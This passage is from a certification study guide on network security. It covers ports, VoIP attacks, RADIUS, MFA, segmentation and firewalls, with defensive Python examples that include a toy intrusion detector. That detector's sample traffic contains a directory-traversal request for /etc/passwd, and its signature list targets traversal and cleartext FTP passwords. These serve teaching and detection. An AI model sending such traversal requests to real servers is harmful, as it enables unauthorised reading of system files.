The sixth domain in the SSCP CBK is Network and Communications Security. This domain accounts for 16% of the SSCP exam.
The Network and Communications Security domain defines six (6) tasks that a certified SSCP should be able to perform:
- Understand Security Issues Related to Networks
- Protect Telecommunications Technologies
- Control Network Access
- Manage LAN-Based Security
- Operate and Configure Network-Based Security Devices
- Implement and Operate Wireless Technologies
This is part 6 in a 7-part series on the (ISC)2 SSCP Common Body of Knowledge (CBK).
Remember: An SSCP who can recall this information will likely pass the exam, but the SSCP who can explain how these concepts are applied in real-world situations is more likely to get hired.
Understand Security Issues Related to Networks
Network and communications security, or protecting data in transit, is a pretty significant part of a cyber security professional’s job. If you’re going to protect data as it travels from point A to point B, you’ll need to know where the weak points might be.
One of the most common conceptual models for understanding network communications is the Open Systems Interconnection (OSI) model. The OSI model consists of seven (7) layers:
- Layer 1 – Physical
- Layer 2 – Data Link
- Layer 3 – Network
- Layer 4 – Transport
- Layer 5 – Session
- Layer 6 – Presentation
- Layer 7 – Application
Think of it this way…
When you sit down at your computer and send a request from some program, the application (layer 7) hands the data down the stack: it is encoded into an agreed format (layer 6), tied to a session with the remote host (layer 5), broken into numbered segments (layer 4), addressed to the remote host’s IP address (layer 3), framed with the hardware addresses of the local link (layer 2), and finally sent as electrical, optical, or radio signals on the medium (layer 1). The receiving computer reverses the process, passing the data up through the same layers to the application on the other end, which might present it to a person or write it to disk.
Each point where the data is wrapped in a new header on the way down (or unwrapped on the way up) represents, again conceptually, a transition from one layer to another.
The TCP/IP model is similar, but simpler.
- Layer 1 – Link
- Layer 2 – Internet
- Layer 3 – Transport
- Layer 4 – Application
Regardless of which model you use, an SSCP should examine the controls at each layer to determine whether or not they’re reasonable and appropriate.
Network topologies refer to the different ways you can build a network. The most common topologies include:
- Ring
- Star
- Bus
- Mesh
- Tree
For an absolutely FANTASTIC description of these network topologies, check out this video from Professor Messer’s CompTIA Network+ course.
SSCPs should also be familiar with commonly used network ports and protocols.
Specifically, you should recognize both the acronym and its corresponding port number. You should also know whether or not the protocol is inherently secure or insecure (i.e., unencrypted).
A few ports you should know:
- 20/21 – FTP (File Transfer Protocol; 21 is the control channel, 20 the data channel; credentials and files travel unencrypted)
- 22 – SSH (Secure Shell; remote command line, encrypted)
- 23 – Telnet (remote command line; unencrypted, including the login credentials)
- 25 – SMTP (Simple Mail Transfer Protocol; email relay; unencrypted unless STARTTLS is negotiated)
- 53 – DNS (Domain Name System; links hostnames to IP addresses; unencrypted and unauthenticated by default)
- 80 – HTTP (Hypertext Transfer Protocol; web, unencrypted)
- 110 – POP3 (Post Office Protocol version 3; email retrieval, unencrypted; POP3S uses 995)
- 161/162 – SNMP (Simple Network Management Protocol; 161 for queries, 162 for traps; versions 1 and 2c send the community string in cleartext, while SNMPv3 adds authentication and encryption)
- 389 – LDAP (Lightweight Directory Access Protocol; user directories; unencrypted unless STARTTLS is used)
- 443 – HTTPS (HTTP over SSL/TLS; encrypted HTTP)
- 636 – LDAPS (LDAP over SSL/TLS; encrypted LDAP)
- 989/990 – FTPS (FTP over SSL/TLS; encrypted FTP; 990 is the control channel, 989 the data channel)
Any protocol that doesn’t include encryption puts data at risk while in transit, particularly from a network sniffer (a tool that can intercept and view that traffic, including any credentials it carries). FTP and Telnet are notorious offenders.
If you want to understand network and communication security in practice, download Nmap and Wireshark and try them out on your home network. Nmap will help you identify network ports and protocols, and Wireshark will let you see a network sniffer in action.
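As an added example (not code from the original page), here is the kind of triage you would do on an Nmap result once you know which protocols are cleartext: it parses Nmap’s grepable (-oG) output and reports every open service that should be replaced with its encrypted counterpart. The scan output embedded in SAMPLE_NMAP_OG is constructed for the example, using documentation addresses rather than a real network.

```python
"""Triage Nmap "grepable" (-oG) output for cleartext services.

Added example, not code from the original page. SAMPLE_NMAP_OG is a
constructed scan result (documentation addresses, not a real network)."""
import re

# Cleartext protocols from the port list above, with the encrypted replacement.
CLEARTEXT = {
    "ftp": "FTPS (989/990) or SFTP over SSH (22)",
    "telnet": "SSH (22)",
    "smtp": "SMTP with STARTTLS, or SMTPS (465)",
    "http": "HTTPS (443)",
    "pop3": "POP3S (995)",
    "snmp": "SNMPv3 with authentication and privacy",
    "ldap": "LDAPS (636) or LDAP with STARTTLS",
}

# Constructed output in the -oG format: "port/state/proto/owner/service/rpc/version/"
SAMPLE_NMAP_OG = (
    "# Nmap 7.94 scan initiated as: nmap -sS -sU -p 1-1024 -oG - 192.0.2.8/29\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, "
    "23/open/tcp//telnet///, 80/open/tcp//http///, 443/open/tcp//https///"
    "\tIgnored State: closed (1019)\n"
    "Host: 192.0.2.11 ()\tPorts: 22/open/tcp//ssh///, 161/open/udp//snmp///, "
    "389/open/tcp//ldap///, 636/open/tcp//ldaps///, 25/filtered/tcp//smtp///\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)

PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_grepable(text):
    """Return (host, port, proto, service) for every *open* port in -oG output."""
    findings = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field (e.g. "Ignored State").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                findings.append((host, int(port), proto, service))
    return findings


def triage(text):
    """List the open cleartext services and what each should be replaced with."""
    return [(host, port, service, CLEARTEXT[service])
            for host, port, _proto, service in parse_grepable(text)
            if service in CLEARTEXT]


if __name__ == "__main__":
    for host, port, service, fix in triage(SAMPLE_NMAP_OG):
        print(f"{host}:{port} {service:<7} cleartext -> use {fix}")
```

Run a real scan with `nmap -sS -sU -p 1-1024 -oG scan.txt <your-home-subnet>` and feed the file to `triage()`; note that the service column is Nmap’s port-to-name guess unless you add `-sV`, so confirm each finding (a sniffer such as Wireshark will show whether the traffic really is cleartext) before reporting it.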
Protect Telecommunications Technologies
Converged communications (or unified communications) refers to the combination of voice, video, and data communication, all on the same network.
It wasn’t that long ago that phone, media, and data networks were entirely separate: different protocols, different cables, different physical connectors. Phone cables were thinner than network cables, which were themselves thinner than the coaxial cables we plugged into the back of our television sets. Phone connectors (RJ11) and data connectors (RJ45) looked somewhat similar, but the coaxial connector looked very different.
Take a look at this voice/data/video (VDV) tester kit to see those differences.
When we started moving all of this technology to the TCP/IP network, we significantly improved the ability to manage and support this technology, not to mention the improvements to the user experience. Voice over IP (VoIP) became the new standard for voice communications, and we’ve continued to improve video and audio compression and transfer utilities, thanks in part to the popularity of services like YouTube and Netflix.
These new improvements were accompanied by new attacks and countermeasures.
Attackers running network sniffers have the ability to intercept and recreate video and voice calls that travel across the network, gaining access to any sensitive information exchanged during those sessions.
Converged networks typically use the Session Initiation Protocol (SIP) to set up, modify, and tear down voice and video sessions, and SIP’s digest authentication is how a user proves they are who they say they are before a session is established. Attackers can exploit weaknesses in SIP implementations (for example, registrars that answer differently for valid and invalid usernames) to identify valid SIP accounts, and may then attempt to hijack sessions or impersonate valid users. Instead of just eavesdropping on a conversation, an attacker could begin controlling it.
VoIP vendors deploy web-based administration interfaces for their unified communication services. If a system administrator forgets to change the default admin password, an attacker can often find the default admin credentials with a quick web search. Once an attacker has those credentials, that attacker can take full control of every VoIP phone managed by that application.
SSCPs take time to analyze their converged networks for these (and similar) vulnerabilities. More importantly, SSCPs educate network and system administrators on essential countermeasures to attacks against these technologies. Those countermeasures include (but aren’t limited to) the following:
- System hardening (e.g., strong passwords)
- Encryption (data in transit: SIP signaling over TLS and media over SRTP)
- Patch management
- Logging and monitoring for known attack signatures
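The last countermeasure, monitoring for known attack patterns, is easy to demonstrate against the SIP username enumeration described above. The following is an added example, not code from the original page: it runs a sliding-window detector over registrar log lines and flags any source that tries REGISTER for many distinct usernames in a short time. The log line format and the SAMPLE_LOG entries are constructed for this example; map LINE_RE to your own PBX’s log format.

```python
"""Detect SIP username enumeration in registrar logs.

Added example, not code from the original page. The log format and the
SAMPLE_LOG lines are constructed for this example; adapt LINE_RE to your
PBX's actual log format (Asterisk, FreeSWITCH, etc.)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+) (\w+) from=(\S+) user=(\S+) status=(\d+)$")

# Constructed log: a legitimate phone, a fast scanner, and a slow scanner.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z REGISTER from=192.0.2.20 user=1001 status=401
2024-05-01T10:00:00Z REGISTER from=192.0.2.20 user=1001 status=200
2024-05-01T10:00:00Z REGISTER from=198.51.100.7 user=1001 status=401
2024-05-01T10:00:01Z REGISTER from=198.51.100.7 user=1002 status=401
2024-05-01T10:00:02Z REGISTER from=198.51.100.7 user=1003 status=403
2024-05-01T10:00:03Z REGISTER from=198.51.100.7 user=1004 status=401
2024-05-01T10:00:04Z REGISTER from=198.51.100.7 user=1005 status=403
2024-05-01T10:00:05Z REGISTER from=198.51.100.7 user=1006 status=403
2024-05-01T10:01:00Z REGISTER from=203.0.113.5 user=2001 status=403
2024-05-01T10:03:00Z REGISTER from=203.0.113.5 user=2002 status=403
2024-05-01T10:05:00Z REGISTER from=203.0.113.5 user=2003 status=403
2024-05-01T10:07:00Z REGISTER from=203.0.113.5 user=2004 status=403
2024-05-01T10:09:00Z REGISTER from=203.0.113.5 user=2005 status=403
2024-05-01T10:09:30Z INVITE from=192.0.2.20 user=1001 status=200
"""


def parse_line(line):
    """Return (timestamp, method, source, user, status) for one log line."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    ts, method, src, user, status = m.groups()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), method, src, user, int(status)


def find_enumeration(lines, window=timedelta(seconds=60), threshold=5):
    """Flag sources that send REGISTER for >= threshold distinct usernames
    inside any `window`. Returns {source: max distinct usernames in one window}."""
    events = sorted(parse_line(line) for line in lines if line.strip())
    recent = defaultdict(deque)      # per source: (timestamp, user) still inside the window
    flagged = {}
    for ts, method, src, user, _status in events:
        if method != "REGISTER":
            continue
        q = recent[src]
        q.append((ts, user))
        while ts - q[0][0] > window:
            q.popleft()
        distinct = len({u for _, u in q})
        if distinct >= threshold:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged


if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG.splitlines()))   # {'198.51.100.7': 6}
```

The slow scanner (203.0.113.5) only shows up if you widen the window, which is the usual trade-off when tuning this kind of rule. Detection is the second line of defence; the first is removing the oracle, so configure the registrar to return the same status for unknown users and bad passwords, and rate-limit or block sources that fail repeatedly.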
Control Network Access
Ultimately, you can achieve effective network security by ensuring that your access control and monitoring techniques are in good working order.
The concept of network access control (NAC) is that you only allow devices on your network if they meet predefined security requirements. For example, is the device operating system fully patched? Is the endpoint running antivirus? Does the device contain a security certificate that was previously installed by a company administrator? The number of specific controls is up to you, based on your organization’s risk appetite and on the level of complexity you’re willing and able to support.
What happens when a non-compliant device attempts to connect? Ideally, that device should be placed in quarantine, a separate network (isolated from all other networks) where someone can examine the device more closely. Addressing the compliance issues (e.g., patching the operating system) is known as remediation. Once remediation is complete, you also need a process for moving that device from quarantine to the company network, a process known as admission.
Fortunately, a number of existing access control standards and protocols provide additional layers of security to help you ensure that unknown/unmanaged devices can’t access your network. A few of the most well-known are:
- IEEE 802.1X – Port-based NAC. When you connect a device to a network port, you have to authenticate (username/password, digital certificate, etc.) before you can access the network itself.
- RADIUS – Remote Authentication Dial-In User Service. You authenticate to the network, a server determines what you’re authorized to do, and that server accounts for what you do while connected. These three (3) elements together are often referred to as AAA (authentication, authorization, and accounting, or “Triple A”). 802.1X implementations often rely on RADIUS, with the switch or access point acting as the RADIUS client and sharing a secret with the server that protects the exchange.
- TACACS – Terminal Access Controller Access-Control System. You log in to a central server first, and it decides what you’re allowed to access on the network. TACACS has been replaced by TACACS+, which separates authentication, authorization, and accounting into distinct functions and encrypts the entire packet body (RADIUS only obscures the password attribute), which is why TACACS+ is commonly used for network device administration.
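To make the RADIUS side of 802.1X concrete, here is an added example (not code from the original page) of one Access-Request / Access-Accept round trip as RFC 2865 specifies it: the NAS hides the User-Password attribute with an MD5 stream keyed by the shared secret and a random Request Authenticator, and the server signs its reply with a Response Authenticator that the NAS can only verify if it holds the same secret. The secret, user database and attribute values are made up for the example.

```python
"""RADIUS Access-Request / Access-Accept exchange (RFC 2865) in miniature.

Added example, not code from the original page. It shows what the NAS
(switch or access point) and the RADIUS server actually compute, and why
the shared secret is the only thing protecting the exchange. The secret,
users and identifiers below are made up for the example."""
import hashlib
import hmac
import secrets
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD = 1, 2            # RADIUS attribute types


def hide_password(password, secret, req_auth):
    """RFC 2865 5.2: pad to 16 bytes, XOR each block with MD5(secret + previous block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ b for p, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out += block
        prev = block
    return out


def reveal_password(hidden, secret, req_auth):
    """Server-side inverse of hide_password."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        out += bytes(c ^ b for c, b in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def attribute(atype, value):
    """Type-Length-Value encoding; length covers the two header bytes."""
    return bytes([atype, 2 + len(value)]) + value


def parse_attributes(data):
    attrs, i = {}, 0
    while i < len(data):
        atype, alen = data[i], data[i + 1]
        attrs[atype] = data[i + 2:i + alen]
        i += alen
    return attrs


def build_access_request(ident, username, password, secret):
    """NAS -> server. The 16 random bytes are the Request Authenticator."""
    req_auth = secrets.token_bytes(16)
    attrs = (attribute(USER_NAME, username)
             + attribute(USER_PASSWORD, hide_password(password, secret, req_auth)))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + req_auth + attrs


def server_handle(request, secret, user_db):
    """Server -> NAS. Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attributes+Secret)."""
    code, ident, length = struct.unpack("!BBH", request[:4])
    assert code == ACCESS_REQUEST and length == len(request)
    req_auth = request[4:20]
    attrs = parse_attributes(request[20:length])
    password = reveal_password(attrs[USER_PASSWORD], secret, req_auth)
    code = ACCESS_ACCEPT if user_db.get(attrs[USER_NAME]) == password else ACCESS_REJECT
    header = struct.pack("!BBH", code, ident, 20)        # no attributes in this reply
    resp_auth = hashlib.md5(header + req_auth + b"" + secret).digest()
    return header + resp_auth


def nas_verify(response, request, secret):
    """NAS side: accept a reply only if its Response Authenticator matches the
    Request Authenticator it sent plus the shared secret."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:length] + secret).digest()
    return ident == request[1] and hmac.compare_digest(expected, response[4:20])


def exchange(username, password, secret, user_db, ident=7):
    """Run one round trip and return (response code, authenticator verified)."""
    request = build_access_request(ident, username, password, secret)
    response = server_handle(request, secret, user_db)
    return response[0], nas_verify(response, request, secret)


def forged_accept_detected(secret, user_db):
    """An on-path attacker flips Access-Reject to Access-Accept. Without the
    secret they cannot recompute the Response Authenticator, so the NAS refuses it."""
    request = build_access_request(9, b"mallory", b"guess", secret)
    response = server_handle(request, secret, user_db)
    forged = bytes([ACCESS_ACCEPT]) + response[1:]
    return response[0] == ACCESS_REJECT and not nas_verify(forged, request, secret)
```

Two practical consequences follow from what the code computes. Everything rests on a single MD5-based secret, so it must be long and random, per NAS, and never the vendor example; and an Access-Request carries no integrity protection at all unless the Message-Authenticator attribute (RFC 2869) is present and required, so RADIUS traffic should run over a protected path (IPsec, or RADIUS over TLS, known as RadSec) rather than bare UDP across an untrusted network.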
You also need to account for remote access operation and configuration. In other words, how do users and administrators outside of the network (e.g., at home, traveling abroad) access network resources? Enabling workers to do their jobs while off-site is commonly known as telework.
Virtual private networks (VPNs) are a commonplace solution to this challenge. Administrators configure a VPN concentrator to accept access requests from authorized users. Once they’ve successfully authenticated, the user experience is often very similar to what they would see if they were sitting at their desks.
These VPN connections were commonly established using Internet Protocol Security (IPsec), a protocol suite that provides both authentication and encryption at the network layer. However, it is more common today to see organizations using SSL/TLS VPNs, which provide remote access through a web browser or a lightweight client and pass through most firewalls because they look like ordinary HTTPS traffic.
Organizations that want to ensure both network connections and desktop applications are limited to the bare minimum may use thin clients to accomplish these goals. Thin clients are physical or virtual computers that rely on the back-end servers to do the heavy lifting, providing very few resources to the end user. If you’re using office applications (document editing, spreadsheet processing, etc.) that are installed on your workstation, you’re using a fat client. If that software is running on a server, chances are you’re using a thin client.
If an attacker knows that they can access an organization’s internal network remotely from anywhere in the world, you’d better believe that attacker will attempt to compromise those remote access portals. They might do this through brute force password guessing, although more sophisticated attackers are likely to use password spraying instead: trying one or two common passwords against many accounts, which avoids tripping per-account lockout thresholds. If all else fails, social engineering a user into disclosing valid remote access credentials is a tried and true attack method.
Popular and effective countermeasures to these types of attacks include:
- Two Factor Authentication (2FA) – Usernames and passwords are something a user knows. We call that a single authentication factor. But what if we also required the user to have something, like a hardware or software token? By configuring our remote access portal to require two factors of authentication, we make it a lot harder for a remote attacker to login (since that attacker would need to compromise both authentication factors).
- Multifactor Authentication (MFA) – MFA is the general term: any combination of two (2) or more distinct kinds of factor, such as something the user knows, something the user has, something the user is (biometrics), or somewhere the user is (location). 2FA is simply the most common special case of MFA, so the two terms are often used interchangeably. What matters is that the factors are of different kinds; a password plus a PIN is still single-factor, since both are something the user knows.
- IP Whitelisting (now usually called allowlisting) – If you know where the user is logging in from, you can allowlist that source IP address for remote access. If an attacker tries to log in from any IP address that hasn’t been allowlisted, the network devices prohibit that action. This is VERY effective, although it can be much harder to maintain, especially for large organizations or users on dynamic addresses.
- Client Certificates – This is similar to a token (something the user has), except the user may not know about it at all. A user can usually see or touch a token, but a client certificate is installed on the device by an administrator beforehand, and the VPN or portal checks for it when the connection is made, so a stolen password alone isn’t enough.
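The following is an added example, not code from the original page, showing two of these countermeasures in working form: a second factor implemented as RFC 6238 TOTP (HMAC-SHA1, 30-second step, 6 digits, with a one-step tolerance for clock drift) and a source IP allowlist, combined into a single portal login decision. The allowlist ranges, the user record, the password and the salt are assumptions for the example; the TOTP secret is the RFC 6238 test-vector seed so the codes can be checked against the RFC.

```python
"""Second factor (TOTP) plus source allowlist for a remote access portal.

Added example, not code from the original page. TOTP follows RFC 6238
(HMAC-SHA1, 30 s step, 6 digits). The allowlist, user record, salt and
password are made up for the example."""
import hashlib
import hmac
import ipaddress
import struct


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """RFC 6238: HOTP with the counter derived from the clock."""
    return hotp(secret, int(unix_time) // step, digits)


def verify_totp(secret, code, unix_time, step=30, window=1):
    """Accept the current code or its neighbours (clock drift), compared in constant time."""
    counter = int(unix_time) // step
    return any(hmac.compare_digest(hotp(secret, counter + d), code)
               for d in range(-window, window + 1))


# Assumed allowlist: a branch office range and one fixed home address.
ALLOWED_SOURCES = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.10/32")]


def source_allowed(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_SOURCES)


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


# Constructed user record; the TOTP secret is the RFC 6238 test-vector seed.
USERS = {
    "alice": {
        "salt": b"example-salt",
        "pw_hash": hash_password("correct horse battery staple", b"example-salt"),
        "totp_secret": b"12345678901234567890",
    }
}


def portal_login(username, password, code, source_ip, now):
    """Return (allowed, reason). The password and OTP checks always both run, and
    unknown users are checked against a stand-in record, so timing does not
    reveal which factor failed; the caller only ever learns one generic reason."""
    record = USERS.get(username, USERS["alice"])      # stand-in record for unknown users
    known = username in USERS
    pw_ok = hmac.compare_digest(hash_password(password, record["salt"]), record["pw_hash"])
    otp_ok = verify_totp(record["totp_secret"], code, now)
    if not source_allowed(source_ip):
        return False, "source not allowlisted"
    if not (known and pw_ok and otp_ok):
        return False, "invalid credentials"
    return True, "ok"
```

Order matters here: the allowlist check costs nothing and happens before any credential is accepted, which is exactly why it defeats spraying from arbitrary addresses, while the password and code are always evaluated together so a failed login never tells the attacker which one was wrong.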
Manage LAN-Based Security
Network segmentation is the practice of dividing one large network into a number of smaller networks, and then putting controls in place to limit the traffic that can travel between those smaller networks. The Payment Card Industry Data Security Standard (PCI DSS), for example, requires network security controls between the cardholder data environment and untrusted networks, and segmenting that environment from the rest of the corporate network is the standard way to limit both the attack surface and the scope of a PCI assessment.
Segmentation often requires some hardware control, software control, or combination of the two to enforce security. You can use access control lists (ACLs) on a firewall or router to explicitly define which hosts are allowed to communicate with each other, as well as the network ports and protocols those hosts are allowed to use; rules are evaluated in order, so a badly ordered list can silently shadow a later rule. You might also use virtual local area networks (VLANs), which are logical groupings of hosts that behave as a separate layer 2 network (a separate broadcast domain) even when they share the same physical switches; traffic between VLANs has to pass through a layer 3 device, which is where the ACLs are enforced.
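Here is an added example, not code from the original page, of how a first-match ACL like the one just described actually behaves, applied to a constructed PCI-style segmentation policy: a cardholder data environment (CDE) that only the web tier (HTTPS) and a jump host (SSH) may reach, with everything else to the CDE denied and unmatched traffic falling through to an implicit deny. It also checks for shadowed rules, the ordering mistake mentioned above. The network ranges and rules are assumptions for the example.

```python
"""First-match firewall ACL evaluation with shadowed-rule detection.

Added example, not code from the original page. The rule set is a
constructed segmentation policy for a cardholder data environment (CDE);
the networks and rules are assumptions for the example."""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "permit" or "deny"
    src: str               # source CIDR
    dst: str               # destination CIDR
    proto: str             # "tcp", "udp" or "any"
    dport: Optional[int]   # None matches any destination port

    def matches(self, src, dst, proto, dport):
        return (ipaddress.ip_address(src) in ipaddress.ip_network(self.src)
                and ipaddress.ip_address(dst) in ipaddress.ip_network(self.dst)
                and self.proto in ("any", proto)
                and self.dport in (None, dport))

    def covers(self, other):
        """True if every packet matching `other` would also match this rule."""
        return (ipaddress.ip_network(other.src).subnet_of(ipaddress.ip_network(self.src))
                and ipaddress.ip_network(other.dst).subnet_of(ipaddress.ip_network(self.dst))
                and self.proto in ("any", other.proto)
                and self.dport in (None, other.dport))


CDE = "10.10.0.0/24"      # cardholder data environment (assumed range)
RULES = [
    Rule("permit", "10.20.0.0/24", CDE, "tcp", 443),            # web tier -> CDE, HTTPS only
    Rule("permit", "10.30.0.5/32", CDE, "tcp", 22),             # jump host -> CDE admin over SSH
    Rule("deny",   "0.0.0.0/0",    CDE, "any", None),           # nothing else reaches the CDE
    Rule("permit", "10.0.0.0/8",   "0.0.0.0/0", "any", None),   # corporate -> everywhere else
    Rule("permit", "10.20.0.7/32", CDE, "tcp", 23),             # shadowed by rule 2: never reached
]


def evaluate(rules, src, dst, proto, dport):
    """Return (action, index of the matching rule); unmatched traffic is denied."""
    for i, rule in enumerate(rules):
        if rule.matches(src, dst, proto, dport):
            return rule.action, i
    return "deny", None          # implicit default deny


def shadowed_rules(rules):
    """Indexes of rules that can never match because an earlier rule covers them."""
    return [j for j, later in enumerate(rules)
            if any(earlier.covers(later) for earlier in rules[:j])]


if __name__ == "__main__":
    print(evaluate(RULES, "10.20.0.7", "10.10.0.3", "tcp", 443))   # ('permit', 0)
    print(evaluate(RULES, "10.20.0.7", "10.10.0.3", "tcp", 23))    # ('deny', 2)
    print(shadowed_rules(RULES))                                     # [4]
```

The shadowed Telnet rule is harmless here (it would have punched a cleartext hole into the CDE), but the same mechanism hides a permit you did need just as quietly, which is why ACL changes belong in review with a shadow check like this one, and why the deny-to-CDE rule sits above the broad corporate permit rather than below it.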
Taking it one step further, you should examine ways to separate the data plane from the control plane and the management plane. The data plane is the traffic your users send and the hardware that forwards it; the control plane is the set of protocols (routing protocols, spanning tree, and so on) that decide how that traffic is forwarded; the management plane is the software and interfaces (SSH, SNMP, web consoles) you use to administer those devices. Keeping these on separate networks or VLANs, with ordinary user traffic unable to reach management interfaces at all, makes it much harder for an attacker who compromises one plane to reach the others.
This underscores the need for secure device management practices and procedures. If an attacker can compromise an administrative interface or the administrative network traffic for just one network device, then the entire network is at risk of compromise. An attacker who can read Simple Network Management Protocol (SNMP) community strings or configuration data may find information (device inventories, credentials, the internal address scheme) that enables the attacker to compromise other devices on the same network. An attacker sniffing network traffic may intercept administrative credentials as they travel across the network via Telnet, an unencrypted protocol.
A combination of network segmentation and secure network device management make it that much harder for an attacker to find a foothold on an organization’s network.
Operate and Configure Network-Based Security Devices
A router is a network device that operates at layer 3, examining the destination IP address of each packet and determining the best path (or route) to get that traffic to its destination. A switch operates at layer 2, forwarding frames to the port where it learned the destination MAC address; it is simpler and faster than a router but makes no routing decisions. While both devices are crucial to network operations, neither is really a network security device, although both can enforce basic controls such as ACLs, port security, and VLANs.
One of the most common network security devices is a firewall. This device sits between multiple network segments, acting like a traffic cop. When data attempts to travel from one network to another, the firewall checks its rules to determine whether or not that action is permitted. If so, the device allows the traffic to pass through to its destination. If not, the device rejects the traffic and prohibits that activity.
In both cases, an administrator may configure the firewall to log these attempts. Rejected traffic is often an indicator of an error, or possibly an attack, while permitted traffic may be useful during security incident response activities and forensics investigations.
A reverse proxy intercepts network traffic between networks, often to expose certain systems or applications to authorized users without exposing everything on the more secure network. For example, you may have an application server on the internal network that you want external users to access. You could configure a proxy to allow only certain services (e.g., HTTP, HTTPS) while hiding the IP address of that internal server. Why hide the IP address? Because you don’t want an attacker to know your internal IP address scheme. An attacker with that knowledge could identify potential targets for an attack, as well as navigate the internal network more quickly (reducing the likelihood that your logging and monitoring controls will detect the attack activity).
It’s also worth noting that a number of organizations favor proxies over VPNs for application access. A properly implemented reverse proxy exposes a single application rather than a routed path into the network, so it is easier to deploy, easier to maintain, and arguably more secure than a VPN for that use case.
Two (2) additional types of network security devices worth noting are network intrusion detection systems (NIDS) and network intrusion prevention systems (NIPS). Both monitor network traffic for potentially malicious activity, but they respond differently. A NIDS watches a copy of the traffic (from a mirror port or tap), logs an event and/or alerts an administrator, but doesn’t do anything to interfere with the traffic. A NIPS sits inline and is more aggressive, automatically taking action (dropping packets or resetting the connection) to contain a potential threat, which also means a NIPS false positive or failure can block legitimate traffic.
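The difference between the two device types is easiest to see in code. The following is an added example, not code from the original page: a miniature signature engine with two content signatures and a port-sweep threshold, run over a constructed packet list in “detect” mode (everything forwarded, alerts raised) and “prevent” mode (matching packets dropped). The packets, signatures and threshold are assumptions for the example; a real sensor works on raw frames and carries thousands of signatures.

```python
"""Signature-based inspection in detect (NIDS) and prevent (NIPS) modes.

Added example, not code from the original page. Packets and signatures are
constructed for the example; a real sensor works on raw frames and has
thousands of signatures."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    dport: int
    payload: bytes = b""


# Content signatures: (name, predicate). Mirrors the "alert tcp ... content:" idea.
SIGNATURES = [
    ("WEB-ATTACK directory traversal",
     lambda p: p.proto == "tcp" and p.dport in (80, 443) and b"../" in p.payload),
    ("POLICY cleartext FTP password",
     lambda p: p.proto == "tcp" and p.dport == 21 and p.payload.upper().startswith(b"PASS ")),
]
SCAN_THRESHOLD = 10     # distinct destination ports from one source


def inspect(packets, mode="detect"):
    """Return (alerts, forwarded). In detect mode every packet is forwarded; in
    prevent mode packets that hit a signature, and every packet from a source
    that crossed the scan threshold, are dropped instead."""
    alerts, forwarded = [], []
    ports_seen = defaultdict(set)
    scanners = set()
    for p in packets:
        hits = [name for name, match in SIGNATURES if match(p)]
        ports_seen[p.src].add(p.dport)
        if len(ports_seen[p.src]) >= SCAN_THRESHOLD and p.src not in scanners:
            scanners.add(p.src)
            hits.append("SCAN port sweep")
        alerts.extend((name, p.src, p.dst, p.dport) for name in hits)
        if mode == "prevent" and (hits or p.src in scanners):
            continue                      # drop rather than forward
        forwarded.append(p)
    return alerts, forwarded


# Constructed traffic: normal browsing, one attack request, one port sweep.
SAMPLE_TRAFFIC = (
    [Packet("10.1.1.5", "203.0.113.10", "tcp", 443, b"\x16\x03\x01")] * 3
    + [Packet("198.51.100.7", "203.0.113.10", "tcp", 80, b"GET /../../etc/passwd HTTP/1.0")]
    + [Packet("203.0.113.99", "203.0.113.10", "tcp", port) for port in range(1, 13)]
)


if __name__ == "__main__":
    for mode in ("detect", "prevent"):
        alerts, forwarded = inspect(SAMPLE_TRAFFIC, mode)
        print(f"{mode}: {len(alerts)} alerts, {len(forwarded)}/{len(SAMPLE_TRAFFIC)} packets forwarded")
```

Both modes raise the same two alerts; only the prevent mode changes what reaches the destination (16 packets become 12). That is the whole trade-off: a NIPS stops the traversal attempt before the web server sees it, but a signature that matches legitimate traffic, or a threshold set too low, turns a false positive into an outage, which is why a sensor is usually run in detect mode and tuned before it is moved inline.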
Traffic-shaping devices (e.g., WAN optimization) attempt to speed up the network by prioritizing traffic and properly allocating bandwidth. This is good news for the users, but it may cause problems for the network security devices. Changes made by traffic-shaping devices can alter the information that security devices rely on in order to identify potentially malicious activity.
An SSCP should understand an organization’s overall network architecture in order to determine where to deploy network security devices and how those devices must be configured.
Implement and Operate Wireless Technologies
